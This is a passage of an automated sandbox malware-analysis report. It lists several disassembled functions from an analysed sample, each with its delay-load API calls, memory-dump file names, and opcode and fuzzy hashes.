                                                      • Part of subcall function 0051D43D: RaiseException.KERNEL32(C06D0057,00000000,00000001,?), ref: 0051D4C1
                                                    Strings
                                                    Memory Dump Source
                                                    • Source File: 00000000.00000002.768935056.0000000000351000.00000020.00000001.01000000.00000003.sdmp, Offset: 00350000, based on PE: true
                                                    • Associated: 00000000.00000002.768901935.0000000000350000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.769823210.00000000005A8000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.769913007.0000000000634000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.769923389.0000000000636000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.769932978.0000000000637000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.769945020.0000000000641000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_0_2_350000_SecuriteInfo.jbxd
                                                    Similarity
                                                    • API ID: AccessDloadSectionWrite$AcquireExceptionHelper2@8LoadRaiseRelease___delay
                                                    • String ID: ymT$mT
                                                    • API String ID: 697777088-604421448
                                                    • Opcode ID: 6b30953c6cf58eecd89b3d1bae3804c8134a9795f864c53b51aae1625c7e1ff8
                                                    • Instruction ID: 380ea728ea740289677eaf89bc7e89a290f9ee96b3c89d599cd0ecffa739b8bf
                                                    • Opcode Fuzzy Hash: 6b30953c6cf58eecd89b3d1bae3804c8134a9795f864c53b51aae1625c7e1ff8
                                                    • Instruction Fuzzy Hash: A5B012D135D5127C3108930CBC07D7609ADD0C1B14331853AB440C8040D4C05C8024B3
                                                    Uniqueness

                                                    Uniqueness Score: -1.00%

                                                    Function 00546D65 Relevance: 5.3, APIs: 1, Strings: 2, Instructions: 10COMMON
                                                    Download Yara Rule
                                                    APIs
                                                    • ___delayLoadHelper2@8.DELAYIMP ref: 00546D52
                                                      • Part of subcall function 0051D43D: DloadAcquireSectionWriteAccess.DELAYIMP ref: 0051D448
                                                      • Part of subcall function 0051D43D: DloadReleaseSectionWriteAccess.DELAYIMP ref: 0051D4B0
                                                      • Part of subcall function 0051D43D: RaiseException.KERNEL32(C06D0057,00000000,00000001,?), ref: 0051D4C1
                                                    Strings
                                                    Memory Dump Source
                                                    • Source File: 00000000.00000002.768935056.0000000000351000.00000020.00000001.01000000.00000003.sdmp, Offset: 00350000, based on PE: true
                                                    • Associated: 00000000.00000002.768901935.0000000000350000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.769823210.00000000005A8000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.769913007.0000000000634000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.769923389.0000000000636000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.769932978.0000000000637000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.769945020.0000000000641000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_0_2_350000_SecuriteInfo.jbxd
                                                    Similarity
                                                    • API ID: AccessDloadSectionWrite$AcquireExceptionHelper2@8LoadRaiseRelease___delay
                                                    • String ID: emT$mT
                                                    • API String ID: 697777088-1861356589
                                                    • Opcode ID: 3a4593649b5ba6f27f8eedde6605fb9fe8ac02045e3944daa4c15fea6cdaeed9
                                                    • Instruction ID: 2cc527b6faaaffc7813be119ea63183f04ce1072d6a1f7320ac7a0f457532bac
                                                    • Opcode Fuzzy Hash: 3a4593649b5ba6f27f8eedde6605fb9fe8ac02045e3944daa4c15fea6cdaeed9
                                                    • Instruction Fuzzy Hash: 7DB012D135C8117C35185B0D7C0BD7609ADE0C1B143318C3AB400C8080D4C05C4014B3
                                                    Uniqueness

                                                    Uniqueness Score: -1.00%

                                                    Function 00546DC9 Relevance: 5.3, APIs: 1, Strings: 2, Instructions: 10COMMON
                                                    Download Yara Rule
                                                    APIs
                                                    • ___delayLoadHelper2@8.DELAYIMP ref: 00546D52
                                                      • Part of subcall function 0051D43D: DloadAcquireSectionWriteAccess.DELAYIMP ref: 0051D448
                                                      • Part of subcall function 0051D43D: DloadReleaseSectionWriteAccess.DELAYIMP ref: 0051D4B0
                                                      • Part of subcall function 0051D43D: RaiseException.KERNEL32(C06D0057,00000000,00000001,?), ref: 0051D4C1
                                                    Strings
                                                    Memory Dump Source
                                                    • Source File: 00000000.00000002.768935056.0000000000351000.00000020.00000001.01000000.00000003.sdmp, Offset: 00350000, based on PE: true
                                                    • Associated: 00000000.00000002.768901935.0000000000350000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.769823210.00000000005A8000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.769913007.0000000000634000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.769923389.0000000000636000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.769932978.0000000000637000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.769945020.0000000000641000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_0_2_350000_SecuriteInfo.jbxd
                                                    Similarity
                                                    • API ID: AccessDloadSectionWrite$AcquireExceptionHelper2@8LoadRaiseRelease___delay
                                                    • String ID: vc$mT
                                                    • API String ID: 697777088-3068329156
                                                    • Opcode ID: 40910d30667bdc24fced1d46e01c6804ca3b728a17588b936323313339af974d
                                                    • Instruction ID: db3feb5f5c4b4a5bc0f606557262639d40169afe97ba616e2568120c4a74e482
                                                    • Opcode Fuzzy Hash: 40910d30667bdc24fced1d46e01c6804ca3b728a17588b936323313339af974d
                                                    • Instruction Fuzzy Hash: 03B012D235C8157C3148570C7C07D7609EDE0C1B14731843AF400C8040D4C05C4014B3
                                                    Uniqueness

                                                    Uniqueness Score: -1.00%

                                                    Function 00546DBF Relevance: 5.3, APIs: 1, Strings: 2, Instructions: 10COMMON
                                                    Download Yara Rule
                                                    APIs
                                                    • ___delayLoadHelper2@8.DELAYIMP ref: 00546D52
                                                      • Part of subcall function 0051D43D: DloadAcquireSectionWriteAccess.DELAYIMP ref: 0051D448
                                                      • Part of subcall function 0051D43D: DloadReleaseSectionWriteAccess.DELAYIMP ref: 0051D4B0
                                                      • Part of subcall function 0051D43D: RaiseException.KERNEL32(C06D0057,00000000,00000001,?), ref: 0051D4C1
                                                    Strings
                                                    Memory Dump Source
                                                    • Source File: 00000000.00000002.768935056.0000000000351000.00000020.00000001.01000000.00000003.sdmp, Offset: 00350000, based on PE: true
                                                    • Associated: 00000000.00000002.768901935.0000000000350000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.769823210.00000000005A8000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.769913007.0000000000634000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.769923389.0000000000636000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.769932978.0000000000637000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.769945020.0000000000641000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_0_2_350000_SecuriteInfo.jbxd
                                                    Similarity
                                                    • API ID: AccessDloadSectionWrite$AcquireExceptionHelper2@8LoadRaiseRelease___delay
                                                    • String ID: mT$uc
                                                    • API String ID: 697777088-3174428877
                                                    • Opcode ID: a91f2ad5b82d0e816f7b6d7a4cc99960bb02e1a451bdec91f89adb31a5fb21f3
                                                    • Instruction ID: 072f3dc4cec5c8501c27915c75c488082cc7b8a518d137a8a675582710989d01
                                                    • Opcode Fuzzy Hash: a91f2ad5b82d0e816f7b6d7a4cc99960bb02e1a451bdec91f89adb31a5fb21f3
                                                    • Instruction Fuzzy Hash: 57B012D135C0117C310C530C7C06DB609EDD0C1B24371C43BB800C8040D8C09C4018B3
                                                    Uniqueness

                                                    Uniqueness Score: -1.00%